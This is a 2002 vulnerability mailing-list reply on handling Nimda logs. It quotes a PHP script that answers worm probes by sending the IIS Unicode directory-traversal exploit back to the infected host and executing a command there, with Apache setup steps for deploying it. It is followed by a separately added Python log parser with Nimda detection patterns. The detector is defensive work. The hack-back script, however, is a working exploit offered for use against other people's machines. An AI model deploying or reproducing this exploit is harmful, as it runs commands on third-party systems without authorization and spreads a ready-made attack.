Vulnerability Development mailing list archives

Re: Publishing Nimda Logs


From: Jonathan Bloomquist <bocasolutions () yahoo com>
Date: Tue, 7 May 2002 12:36:09 -0700 (PDT)


--- "Deus, Attonbitus" <Thor () HammerofGod com> wrote:

-- snip --

  1) Recommended. Go for it and publish the IP's and let the "Gods of IP"
  sort out the damage.
  2) A Bad Thing. These are innocent victims, and you will just have them be
  attacked by evil people.
  3) Boring. Who cares? It's Nimda, and an everyday part of life. Deal with
  it and ignore the logs.

  If "1," then I was thinking of going with a "Hall of Shame" and providing
  ARIN look ups, contacts, and the whole bit. I could even allow other
  people to post logs there and stuff like that...

  Input appreciated.


How about another option (4. warn the infected) as
proposed in this slashdot post (text follows): 

http://slashdot.org/comments.pl?sid=21830&cid=2329699

I made a PHP script, by modifying a similar one used
for Code Red. First make a "scripts" directory in your
web server's root directory. Now put this into a file
called "root.exe" 

<?php
/* Address of the host that just probed us; $_SERVER works without register_globals */
$remote = $_SERVER['REMOTE_ADDR'];

/* Open a connection to the offender (5 second timeout) */
$fp = fsockopen($remote, 80, $en, $es, 5);

/* Check to see if the connection actually opened */
if ($fp)
{
    /* URL-encode the message... */
    $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");

    /* ...and send it */
    fputs($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\n\n");

    /* close the connection (though it probably got closed automatically) */
    fclose($fp);
}

/* for fun and confusion.. answer the probe with a fake Apache 404 page */
header("HTTP/1.0 404 Not Found");

echo("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo("<html><head>\n<title>404 Not Found</title>\n</head><body>\n");
echo("<h1>Not Found</h1>\n");
echo("The requested URL " . $_SERVER['SCRIPT_NAME'] . " was not found on this server.\n");
echo("<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n");
echo("</body></html>\n");

/* Record the warned host, with a timestamp, in the log file */
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $remote . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then (after making sure users can access the file), try going to
http://machine/scripts/root.exe. It's going to print out the contents
of that file. You want to change that, right?

Well, here's how you change that. Edit your httpd.conf file
(/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put
in this type line, like this:

AddType application/x-httpd-php .php .php3 .exe 

Now restart Apache by issuing one of either: 
/etc/rc.d/init.d/httpd restart 
apachectl restart 

That should do it, and you're going to have a logfile of all the people
who have been warned in /tmp/nimda.log.



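A defender-side way to act on Nimda logs without sending anything back to the infected host: this is an added example, not code from the post or from the Slashdot script, and it reads constructed Apache access-log lines (not real data) for the probe paths Nimda is known to issue, producing the per-source list that options 1, 2 or 4 above would all need as input.

```python
import re
from collections import Counter

# Constructed sample Apache combined-log lines (not taken from the post).
# The first, second and fourth request paths are the ones Nimda probes for.
SAMPLE_LOG = """\
10.0.0.5 - - [07/May/2002:12:01:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
10.0.0.5 - - [07/May/2002:12:01:14 -0700] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
192.0.2.20 - - [07/May/2002:12:02:40 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
10.0.0.9 - - [07/May/2002:12:03:02 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
"""

# source IP, timestamp, method, request path, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Request-path signatures of Nimda's IIS probes: the root.exe / cmd.exe
# backdoor paths and the overlong-UTF-8 traversal encodings of '/' and '\'.
NIMDA_PATTERNS = [
    re.compile(r'/root\.exe', re.I),
    re.compile(r'/cmd\.exe', re.I),
    re.compile(r'%c0%af|%c1%1c', re.I),
]

def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)}

def is_nimda_probe(path):
    return any(p.search(path) for p in NIMDA_PATTERNS)

def infected_hosts(log_text):
    """Return {ip: probe_count} for every source that sent a Nimda-style request."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_nimda_probe(rec["path"]):
            hits[rec["ip"]] += 1
    return dict(hits)

def format_report(hits):
    """One line per host, in the same 'IP ... - dirty' shape the post's /tmp/nimda.log uses."""
    return [f"{ip} probes={n} - dirty" for ip, n in sorted(hits.items())]

if __name__ == "__main__":
    for line in format_report(infected_hosts(SAMPLE_LOG)):
        print(line)
```

Feeding it a real access_log instead of SAMPLE_LOG gives the deduplicated source list, with the non-probe traffic (the 192.0.2.20 line here) left out.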

